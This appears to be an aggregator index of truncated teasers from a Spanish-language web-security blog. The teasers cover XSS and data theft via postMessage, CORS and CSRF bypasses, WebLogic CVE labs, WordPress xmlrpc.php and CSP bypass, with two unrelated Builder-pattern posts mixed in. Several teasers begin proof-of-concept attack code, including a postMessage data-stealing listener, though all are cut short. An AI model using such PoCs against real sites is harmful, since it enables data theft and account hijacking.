Spyse Recognition - Cybersecurity Tool
Today there are many recognition tools, but let me introduce one that I use today to discover some types of attacks that I will discuss below.Information about a domainThere are many vulnerabilities...
View ArticleArticle 0
Patron de diseño Builder - parte 2 Si te has perdido la parte 1. ver parte 1En esta parte veremos 2 formas de usar el patron Builder.Tenemos que generar un objeto helado:Opcion 1: Usaremos la opción...
View ArticleArticle 1
Patron de diseño Builder - parte 1 El patron de diseño Builder nos permite crear objetos complejoscentralizando el proceso de creación en un único punto. Esto nos permite tener un único proceso de...
View Articlexss Via PostMessage
Poc ejemplo xss PostMessage, id y value deben cambiarse dependiendo de el codigo de postMessage.<a href="#" onclick="xss()">click me</a><script>function xss() { var win =...
View ArticlepostMessage Robo de Datos + Guardado en archivo log
El siguiente es un Poc para robo de datos utilizando postMessage:<script> function listener(event) { //alert(event.data.value); var str = event.data.value; var xmlhttp; if...
View ArticleCORS Bypass 2 - Guardando Resultados en Archivo
<!DOCTYPE html> <html> <head> <script> function hack() { var xmlhttp; if (window.XMLHttpRequest) { xmlhttp=new XMLHttpRequest(); } else...
View ArticleWebLogic CVE-2019-2725/CNVD-C-2019-48814
Instalación de maquina vulnerable:1.- sudo docker pull vulhub/weblogic2.- sudo docker run -dit -p 7001:7001 vulhub/weblogicDescripcion:Oracle WebLogic Server es un middleware para implementar y...
View ArticleWebLogic CVE-2017-10271
Instalacion para POC:1.- sudo docker pull zhiqzhao/ubuntu_weblogic1036_domain2.- sudo docker run -d -p7001:7001 -p80:7001 zhiqzhao/ubuntu_weblogic1036_domainDescripcion:Vulnerabilidad en el componente...
View ArticleCORS Bypass
Un CORS mal configurado nos permite ataques tipos CSRF, Obtener datos privados y mas. Aqui les dejo una entrada de CORS:https://arthusu.blogspot.com/2018/08/cors-mal-configurado-intercambio-de.htmlY un...
View ArticleAtaque de extension de longitud
¿Que es?En criptografía y seguridad informática, un ataque de extensión de longitud es un tipo de ataque en el que un atacante puede usar el hash y la longitud del mensaje, para calcular el hash de un...
View ArticleNode JS: Seguridad y Explotacion
IntroducciónNode.js es un entorno en tiempo de ejecución multiplataforma, de código abierto, para la capa del servidor basado en el lenguaje de programación ECMAScript, asíncrono, con I/O de datos en...
View ArticlePHPCS Security Audit en XAMPP
phpcs security audit es un conjunto de reglas PHP_CodeSniffer que encuentra vulnerabilidades y debilidades relacionadas con la seguridad en el código PHP.Github:...
View ArticleUtilizando Redireccionamientos abiertos para bug bounties
IntroduccionEsto es solo una publicacion rapida que describe algunos consejos utiles para identificar vulnerabilidades de redireccionamiento abierto y tambien como utilizarlas para crear...
View ArticleSelenium Automatizando el navegador PHP-WebDriver by Facebook
¿Que es Selenium?Selenium automatiza los navegadores. ¡Eso es! Lo que hagas con ese poder depende totalmente de ti. Principalmente, es para automatizar aplicaciones web con fines de prueba, pero...
View ArticleSaltar CSRF Referer en Blanco
Cuando se comenta un video en xvideos, se envian 0 tokens CSRF. La solicitud es: POST http://www.xvideos.com/video-post-comment/video_id/ HTTP/1.1 user=testuser&comment=testy&test=ok podemos...
View ArticleSaltando CSRF
Cross site request forgery (CSRF) estan diseñados para enviar que un FORM POST oculto en maligno.com sea enviado en secreto para secuestrar su cuenta en ejemplo.com. Los sitios web como Facebook...
View ArticleWordpress xmlrpc.php: vulnerabilidades comunes y como explotarlas
¿De que se trata este post?Es posible que haya visto un archivo xmlrpc.php en muchos sitios de Wordpress que visite, incluso que haya intentado buscar el error (el servidor XML-RPC solo acepta...
View ArticleComo saltar CSP (Content Security Policy)
IntroduccionLa política de seguridad de contenido (CSP) es un estándar de seguridad informática introducido para evitar la secuencia de comandos (XSS), clickjacking y otros ataques de inyección de...
View ArticleUsando Burp con TOR
Buenas amigos esto es algo fácil de hacer así que espero hacerlo por pasos y si agregar unas cuantas imágenes.1.- descargamos TOR: https://www.torproject.org/2.- abrimos el navegador de tor vamos a...
View ArticleIDOR: Referencia insegura de objeto directo
Es una vulnerabilidad que generalmente conduce a la perdida de datos confidenciales, pero también puede dar lugar a una menor modificación de los datos.Considere una URL como:...
View Article